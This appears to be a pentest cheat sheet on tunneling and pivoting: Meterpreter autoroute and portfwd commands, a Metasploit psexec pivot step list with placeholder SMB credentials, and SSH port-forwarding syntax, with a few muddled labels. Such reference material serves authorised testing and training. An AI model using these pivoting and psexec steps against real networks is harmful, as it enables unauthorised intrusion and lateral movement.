60f Tunneling & Pivoting

Tunneling & Pivoting

Please keep in mind the IP address of the target host, the port you want to connect to and the local port that will become unavailable while listening for and interacting with the target port.

autoroute

run autoroute -s [subnet] -n [netmask]

Example:

run autoroute -s 192.168.10.0 -n 255.255.255.0

portfwd

Configure autoroute

To use the portfwd feature in Meterpreter, follow these steps:

portfwd add -L 127.0.0.1 -l [local_port] -p [remote_port] -r [remote_host]

Example:

Within a meterpreter session

meterpreter> portfwd add -L 127.0.0.1 -l <rhp> -r 192.168.30.9 -p 445

Pivoting

  1. Configure portfwd
  1. Setup PSExec
    1. background
    1. use exploit windows/smb/psexec
    1. set lhost 172.16.10.15
    1. set lport <rhp>
    1. set rhost 127.0.0.1
    1. set rport <rhp>
    1. set smbuser <user>
    1. set smbdomain <domain.root>
    1. set smbpass <password>

SSH Tunneling

When initiating the tunnel during session creation

ssh -C -L 8080:<target IP address>:80 user@remote_host

When initiating the tunnel from within the target’s ssh session

ssh> -C -L 8080:<local IP address>:80

Port Forwarding

Syntax:

# Remote Host
ssh -C -L [local_port]:[remote_host]:[remote_port] [user]@[ssh_server]
# Local Host
ssh> -C -L [local_port]:[local_host]:[remote_port]